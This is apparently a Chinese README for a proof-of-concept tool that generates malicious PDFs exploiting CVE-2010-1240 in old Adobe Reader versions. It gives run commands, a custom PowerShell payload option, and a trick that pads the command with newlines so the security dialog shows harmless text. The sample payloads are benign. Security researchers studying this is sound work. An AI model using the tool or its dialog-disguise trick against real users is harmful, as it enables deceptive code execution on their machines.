用于演示 Adobe Reader 中 CVE-2010-1240 漏洞(通过恶意 PDF 启动操作)的教育研究工具。
本工具严格用于教育目的和安全研究,旨在演示 CVE-2010-1240 漏洞。仅应在受控环境中使用,以学习 PDF 安全机制和漏洞研究。
请勿将此工具用于恶意目的。
本项目演示了 CVE-2010-1240,这是 Adobe Reader 中一个通过恶意 PDF 启动操作实现任意代码执行的关键漏洞。该漏洞影响 Adobe Reader 和 Acrobat 9.3.3 及 8.2.3 之前的版本。
git clone https://github.com/12345qwert123456/cve-2010-1240.git
cd cve-2010-1240
# 创建一个基本的 CVE-2010-1240 演示 PDF
python pdf_generator.py
# 创建带有自定义 PowerShell 负载的 PDF
python pdf_generator.py -c "Write-Host 'CVE-2010-1240 Demo'; pause"
# 指定输出文件名
python pdf_generator.py -o cve_demo.pdf
当在受影响的 Adobe Reader 版本中打开恶意 PDF 时,启动操作会触发安全对话框:

显示尝试执行 PowerShell 的启动操作的 Adobe Reader 安全警告
绕过安全对话框后,CVE-2010-1240 漏洞成功执行 PowerShell 负载:

PDF 启动操作漏洞打开的 PowerShell 窗口,显示成功代码执行
高级攻击者可以利用换行和格式化手段来伪装实际执行的命令:

演示攻击者如何操纵启动操作对话框显示无害文本,同时通过精心设计的格式和换行隐藏实际恶意命令
该技巧利用用户心理,在对话框中显示无害文本,而实际恶意命令通过仔细的格式和换行隐藏。
负载示例:
pdf_generator.py -o poc.pdf -c "Write-Host \"'CVE-2010-1240 PoC'; pause\"\n\n\n\n\n\n\n# Press Open Button"
usage: pdf_generator.py [-h] [-o OUTPUT] [-c COMMAND]
CVE-2010-1240 PDF启动操作研究工具
options:
-h, --help 显示此帮助消息并退出
-o OUTPUT, --output OUTPUT
输出 PDF 文件名(默认:cve_2010_1240_demo.pdf)
-c COMMAND, --command COMMAND
要执行的 PowerShell 命令
CVE-2010-1240 是一个严重漏洞,影响 Adobe Reader 和 Acrobat,源于 PDF 文档中对启动操作的不正确处理。该漏洞允许远程攻击者通过制作滥用启动操作机制的恶意 PDF 文件来执行任意代码。
生成的 PDF 通过以下方式利用 CVE-2010-1240:
❌ 易受攻击:
✅ 已修复: